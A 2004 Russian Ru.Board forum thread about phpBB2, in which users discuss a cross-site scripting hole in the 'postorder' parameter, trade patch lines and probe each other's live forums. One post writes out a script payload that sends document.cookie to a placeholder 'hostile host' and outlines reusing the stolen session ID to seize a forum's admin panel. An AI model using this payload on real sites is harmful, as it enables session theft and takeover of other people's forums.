Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » IkonBoard и другие форумы » Другие форумы » Все о phpBB2

Модерирует : Antuan, Dekker

Antuan (29-10-2004 02:01):  Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

   

NT



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору


Мы переехали в новый топик! Сюда!

 
 

В этой теме обсуждаем форумный движок phpBB


» Полезные Линки:
   » http://www.phpBB.com  - официальный сайт  
   » http://forumimages.com - сайт с графикой для phpBB2
   » http://sourceforge.net/...  -  phpBB 2.0.8a
   » http://www.phpBB.com/phpBB/  - обсуждение и поддержка (english)
   » http://www.phpbbhacks.com  - всевозможные хаки  
   » http://www.phpbbhacks.com/templates.php  - шаблоны для phpBB  
   » http://www.phpbbhacks.com/templatesdemo
   » http://www.phpbb2-users.de/ - довольно хороший сайт про phpBB
   » http://myphpbb.com.ru/ - Неплохой сайт про phpBB, много хаков.
   » http://forum.ru-board.com/...фильтр по форуму "Другие форумы" по теме phpBB
   » http://www.hacksphpbb.ru  - Еще один российский сайт модов (хаков)  
 
» Полезные Хаки:
   » Advanced Quick Reply Hack (Быстрый ответ) [ чинить баг ]
   » Last Post Topic on Index (Название топика с последним ответом на главной странице)
   » Forum Icons (Разные иконки форумов)
   » Double post merge (Склеивание постов)
   » Translit BBCode (Заменяет транслит на кириллицу методами php)
   » eDonkey Link replacer (Добавляет любой текст в звериные линки на форуме)
   » "Хак" для Advanced Quick Reply Hack (Добавляет имя цитируемого юзера)
   » Хак: Замечания к постам (Текст модератора под постом)
   » Хак: Бан в куки (информация о том что ты был забанен пишется еще и в cookies)
 
»  Ответы на вопросы:
   » Не работают куки (cookies)
   » Как в phpBB вставить баннеры и все такое прочее?
   » Форум заменяет русский текст на "лабуду" типа "тест"
   » Advanced Quick Reply добавляет лишнюю строку при цитировании
   » Как отредактировать условия регистрации?
   » Как убрать надпись о том что если вам меньше 13ти лет...?

Всего записей: 1861 | Зарегистр. 27-07-2002 | Отправлено: 00:17 04-09-2002 | Исправлено: xntx, 23:46 28-10-2004
romutis

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
hamshen
 

Цитата:
$post_order = (!empty($HTTP_POST_VARS['postorder'])) ? intval($HTTP_POST_VARS['postorder']) : intval($HTTP_GET_VARS['postorder']);  

 
Ну и что это даст? Зачем преобразовывать переменную postorder в целое число, если эта переменная задается как "asc" или "desc"?

Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 19:32 01-03-2004
hamshen

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Kakuraka
Может быть кодировка так же шлется в http-заголовке?
 
Добавлено
romutis
Да. Я прогнал. Причем неплохо

----------
Хорошие умирают молодыми, но плохие умирают уродливо.

Всего записей: 614 | Зарегистр. 22-04-2002 | Отправлено: 19:43 01-03-2004
Kakuraka



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
в http-заголовке написано  
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
 
ВОТ > http://www.toolband.com.ua/phpbb/index.php  

Всего записей: 149 | Зарегистр. 05-11-2002 | Отправлено: 19:53 01-03-2004
hamshen

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Там надо что-то типа такого сделать:

Код:
$post_order = substr($post_order, 0, 3);

 
Добавлено
Kakuraka

Цитата:
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

Это у тебя написано в html заголовке. А в http заголовке у тебя написано следующее:

Код:
Content-Type: text/html; charset=koi8-r

У него больший приоритет и поэтому браузер пытается его отобразить в koi8-r.
Пиши провайдерам своим чтобы они его убрали, или поменяли на win-1251.
 


----------
Хорошие умирают молодыми, но плохие умирают уродливо.

Всего записей: 614 | Зарегистр. 22-04-2002 | Отправлено: 19:56 01-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
хм... как ни странно, а у меня уязвимость не работает
почему бы это?

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 22:05 01-03-2004
romutis

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xntx

Цитата:
хм... как ни странно, а у меня уязвимость не работает  

Еще как работает! Куки и sid'ы кажет - в полный рост!
 
 
Добавлено
И не только у тебя эта уязвимость работает. У всех сайтов, найденных на последних трех страницах этого топика, эта уязвимость работает. Рыть дальше другие сайты было влом.
 
"Это просто праздник какой-то" (С) Карабас-Барабас

Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 13:11 02-03-2004 | Исправлено: romutis, 13:14 02-03-2004
Jovani



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
И не только у тебя эта уязвимость работает. У всех сайтов, найденных на последних трех страницах

Нужно было и тут порыть: http://monitor.net.ru/forum/index.php
В общем, кто хотел, тот закрыл

Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 23:16 02-03-2004
romutis

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Jovani

Цитата:
В общем, кто хотел, тот закрыл  

 
Ну ты явно не из них.
На твоем сайте отлично показываются куки и sid (monitor_data & monitor_sid) - причем в отдельном окошечке.

Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 23:22 02-03-2004
Jovani



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Угу ...
Странно, по идее это должно помочь:
 
$post_order = (!empty($HTTP_POST_VARS['postorder'])) ? htmlspecialchars($HTTP_POST_VARS['postorder']) : htmlspecialchars($HTTP_GET_VARS['postorder']);  
 
 
Не помогает ...
Прикол

Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 23:38 02-03-2004 | Исправлено: Jovani, 00:03 03-03-2004
romutis

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Jovani

Цитата:
Странно, по идее это должно помочь:  

 
Как видишь, не помогает. Ты на чем тестировал - на примере скрипта с секуритилаб? Дык там он намеренно дан нерабочий - но, в принципе, легко модифицируемый в рабочий.
 
Добавлено
P.S. У меня на сайте этот трюк не проходит.

Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 23:58 02-03-2004
Jovani



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
romutis
Как править-то ?

Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 00:05 03-03-2004
romutis

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Jovani

Цитата:
Как править-то ?

 
Именно так и правится - вышеприведенной тобой строкой. Проверь еще раз внимательно - может ты старую строчку после новой оставил?

Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 00:08 03-03-2004
Jovani



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Проверь еще раз внимательно - может ты старую строчку после новой оставил?

Проверил - все OK, код правильный, но прикол в том, что работает "через раз" ...

Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 00:20 03-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
romutis

Цитата:
Еще как работает! Куки и sid'ы кажет - в полный рост!  

да, ты прав
 
ЗЫ: но этой уязвимостью ничего не сделаешь, это как та что я нашел в advanced quick reply. ведь кавычку вставить нельзя а значит адрес тоже никакой не впишешь... тоесть куки увидеть можешь только ты, на другой урл их не перекинешь так как домен надо брать в кавычки...

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 09:43 03-03-2004
romutis

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xntx
 
Меняешь alert на prompt - и спокойно редактируешь значения. Можно там и кавычки поставить.  
 
На твоем сайте поредактировать?

Всего записей: 824 | Зарегистр. 21-07-2002 | Отправлено: 10:10 03-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
romutis

Цитата:
На твоем сайте поредактировать?

поредактируй
все равно ему жить меньше месяца осталосььь...  
а до меня все равно не доходит как ты хочешь чтото сделать..

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 17:34 03-03-2004
alexhemp



упал с пальмы
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xntx
Идея мне кажется в том, что можно сделать cпециальный скрипт на вражеском хосте и  
запостить такой линк на том форуме, что хочешь атаковать, типа  
 
http://host/phpBB/viewtopic.php?t=123&postorder=(здесь JavaScript код указанный ниже)
<scipt>
document.write("<img src=http://вражеский хост/script?cookie=>" + document.cookie);
</script>
 
В скрипте на вражеском хосте можно написать попытку входа в админпанель делая GET по http://host/phpBBadmin/index.php?sid=SID_из_куков и разбирая результат.
 
Далее, если админ на такой линк нажмет (сходу все пристойно, линк просто и все)
то дело техники и оперативности захватить управления форумом.
 
Это просто то, что мне в голову пришло, может и проще все или сложнее, но идею я думаю ухватил.


----------
Ничего не могу с собой поделать - Я ГЛАВНЫЙ! © Федор Сумкин

Всего записей: 1944 | Зарегистр. 13-12-2001 | Отправлено: 18:20 03-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
alexhemp

Цитата:
<scipt>  
document.write("<img src=http://вражеский хост/script?cookie=>" + document.cookie);  
</script>  

заметь, у тебя кавычки в коде, а они-то как раз слешатся...

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 20:01 03-03-2004
Bomj



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Народ! Нужен форум. Поставить сам наверное не смогу, так как не знаком ни с mysql ни с php и с другими формулировками, они мне совсем ничего не говорят. Может кто возьмётся поставить? Готов заплатить, не много, рублей 500. И ещё может существуют форумы с установкой по-проще? Времени совсем нет, так бы я сам попробовал.

Всего записей: 84 | Зарегистр. 29-08-2003 | Отправлено: 09:07 04-03-2004
xntx



хнотик-багоискатель
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Bomj
для установки форума типа phpBB не нужно никаких знаний php/mysql, так что иди качай его, регай себе аккаунт на какомнить сайте и вперед...

----------
Hello world!

Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 09:32 04-03-2004
   

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

Компьютерный форум Ru.Board » IkonBoard и другие форумы » Другие форумы » Все о phpBB2
Antuan (29-10-2004 02:01):


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.Board
© Ru.Board 2000-2020

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru